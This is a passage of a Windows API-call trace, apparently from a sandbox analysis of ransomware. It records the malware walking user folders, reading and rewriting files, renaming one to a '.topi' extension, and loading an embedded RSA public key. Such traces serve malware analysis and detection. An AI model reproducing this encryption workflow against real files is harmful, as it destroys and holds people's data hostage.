[0096.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c28 [0096.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bf8 [0096.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0096.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0096.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0096.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0096.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.953] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4c40 [0096.953] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a48 [0096.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0096.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0096.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c10 | out: hHeap=0x680000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c10 [0096.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.954] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0096.954] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c10 | out: hHeap=0x680000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.955] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0096.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.955] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c40 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c28 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4bf8 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4be0 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02fc0 | out: hHeap=0x680000) returned 1 [0096.956] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.957] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.957] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xd638, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xd638, lpOverlapped=0x0) returned 1 [0096.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0096.958] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xd63d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.958] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.958] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0096.958] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dff8 [0096.959] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\Yc2x5vSq8CXQP.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\yc2x5vsq8cxqp.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_tGjm1G\\Yc2x5vSq8CXQP.swf.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_tgjm1g\\yc2x5vsq8cxqp.swf.topi")) returned 1 [0096.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.959] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.959] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b4258 | out: hHeap=0x680000) returned 1 [0096.961] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34a90320, ftCreationTime.dwHighDateTime=0x1d5c396, ftLastAccessTime.dwLowDateTime=0x214a79f0, ftLastAccessTime.dwHighDateTime=0x1d5ba1b, ftLastWriteTime.dwLowDateTime=0x214a79f0, ftLastWriteTime.dwHighDateTime=0x1d5ba1b, nFileSizeHigh=0x0, nFileSizeLow=0xd63d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Yc2x5vSq8CXQP.swf", cAlternateFileName="YC2X5V~1.SWF")) returned 0 [0096.961] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0096.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0096.961] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.961] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d2f8 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df28 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3970 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3b50 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3ad8 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3a60 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3e98 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3f10 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3f88 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4000 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e060 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31621a8 | out: hHeap=0x680000) returned 1 [0096.962] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e39e8 | out: hHeap=0x680000) returned 1 [0096.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d3c8 | out: hHeap=0x680000) returned 1 [0096.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dab0 | out: hHeap=0x680000) returned 1 [0096.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3e20 | out: hHeap=0x680000) returned 1 [0096.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0096.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0096.963] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.963] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0096.963] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0096.963] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0096.963] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.963] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.963] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.963] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.963] PathFindFileNameW (pszPath="") returned="" [0096.965] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.965] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.965] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0096.965] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0096.965] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0096.965] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.966] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.966] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.966] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.966] PathFindFileNameW (pszPath="") returned="" [0096.966] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.966] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0096.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0096.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0096.966] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.967] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.967] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.967] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.967] PathFindFileNameW (pszPath="") returned="" [0096.968] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0096.968] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0096.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\") returned="D7sre-3HX8SgHUb\\" [0096.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\") returned="Gydf_ honDHk\\" [0096.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0096.968] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0096.969] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0096.969] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.969] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.969] PathFindFileNameW (pszPath="") returned="" [0096.969] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\edkvuK3CEFna.pdf") returned=".pdf" [0096.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Gydf_ honDHk\\D7sre-3HX8SgHUb\\edkvuK3CEFna.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\gydf_ hondhk\\d7sre-3hx8sghub\\edkvuk3cefna.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.969] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=64271) returned 1 [0096.969] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.974] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xfae9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.974] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.975] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.975] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.975] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.975] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xfb0f, lpOverlapped=0x0) returned 1 [0096.976] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.976] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.976] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.976] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.976] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0096.977] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.977] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.977] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.977] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.977] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.977] GetLastError () returned 0x0 [0096.978] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.978] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0096.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.978] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.978] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.978] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.978] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.978] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfb10) returned 0x9a06a00 [0096.979] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.979] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02fc0 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4be0 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03008 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4bf8 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c28 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4c40 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.979] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.980] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0096.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c28 | out: hHeap=0x680000) returned 1 [0096.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4c40 | out: hHeap=0x680000) returned 1 [0096.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0096.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.980] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.980] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 